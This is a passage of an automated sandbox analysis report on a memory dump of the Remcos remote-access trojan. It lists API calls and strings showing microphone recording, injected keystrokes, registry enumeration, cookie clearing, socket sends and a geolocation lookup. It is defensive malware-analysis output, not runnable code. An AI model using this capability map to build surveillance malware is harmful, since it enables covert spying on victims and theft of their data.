                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                          • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                          • String ID: ,kG$0kG
                                          • API String ID: 3815856325-2015055088
                                          • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                          • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                          • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                          • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                          APIs
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                          • waveInStart.WINMM ref: 00401CFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                          • String ID: dMG$|MG$PG
                                          • API String ID: 1356121797-532278878
                                          • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                          • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                          • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                          • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                            • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                            • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                            • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                          • TranslateMessage.USER32(?), ref: 0041D4E9
                                          • DispatchMessageA.USER32(?), ref: 0041D4F3
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID: Remcos
                                          • API String ID: 1970332568-165870891
                                          • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                          • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                          • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                          • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                          • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                          • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                                          • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • _memcmp.LIBVCRUNTIME ref: 00445423
                                          • _free.LIBCMT ref: 00445494
                                          • _free.LIBCMT ref: 004454AD
                                          • _free.LIBCMT ref: 004454DF
                                          • _free.LIBCMT ref: 004454E8
                                          • _free.LIBCMT ref: 004454F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                          • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                          • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                          • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tcp$udp
                                          • API String ID: 0-3725065008
                                          • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                          • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                          • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                          • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                          APIs
                                            • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                          • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                          • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                            • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                          • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                          • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                          • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                            • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                            • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                          • String ID: t^F
                                          • API String ID: 3950776272-389975521
                                          • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                          • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                          • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                          • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                          • ExitThread.KERNEL32 ref: 004018F6
                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                          • String ID: PkG$XMG$NG$NG
                                          • API String ID: 1649129571-3151166067
                                          • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                          • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                          • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                          • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                          • String ID: .part
                                          • API String ID: 1303771098-3499674018
                                          • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                          • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                          • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                          • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InputSend
                                          • String ID:
                                          • API String ID: 3431551938-0
                                          • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                          • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                          • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                          • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16_free
                                          • String ID: a/p$am/pm$zD
                                          • API String ID: 2936374016-2723203690
                                          • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                          • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                          • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                          • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                          APIs
                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Enum$InfoQueryValue
                                          • String ID: [regsplt]$xUG$TG
                                          • API String ID: 3554306468-1165877943
                                          • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                          • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                          • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                          • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: D[E$D[E
                                          • API String ID: 269201875-3695742444
                                          • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                          • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                          • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                          • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                            • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                            • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumInfoOpenQuerysend
                                          • String ID: xUG$NG$NG$TG
                                          • API String ID: 3114080316-2811732169
                                          • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                          • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                          • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                          • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                          • __alloca_probe_16.LIBCMT ref: 004511B1
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                          • __freea.LIBCMT ref: 0045121D
                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID: PkGNG
                                          • API String ID: 313313983-263838557
                                          • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                          • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                          • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                          • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                          APIs
                                            • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                            • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                            • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                          • _wcslen.LIBCMT ref: 0041B763
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                          • API String ID: 37874593-122982132
                                          • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                          • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                          • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                          • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                          APIs
                                            • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                            • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                            • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1133728706-4073444585
                                          • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                          • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                          • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                          • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                          • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                          • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                          • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                          APIs
                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                          • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                          Strings
                                          • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleOpen$FileRead
                                          • String ID: http://geoplugin.net/json.gp
                                          • API String ID: 3121278467-91888290
                                          • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                          • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                          • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                          • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                          APIs
                                            • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                          • _free.LIBCMT ref: 00450F48
                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                          • _free.LIBCMT ref: 00450F53
                                          • _free.LIBCMT ref: 00450F5E
                                          • _free.LIBCMT ref: 00450FB2
                                          • _free.LIBCMT ref: 00450FBD
                                          • _free.LIBCMT ref: 00450FC8
                                          • _free.LIBCMT ref: 00450FD3
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                          • int.LIBCPMT ref: 00411183
                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                          • std::_Facet_Register.LIBCPMT ref: 004111C3
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                          • String ID: (mG
                                          • API String ID: 2536120697-4059303827
                                          • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                          • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                          • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                          • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                          APIs
                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                            • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                            • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
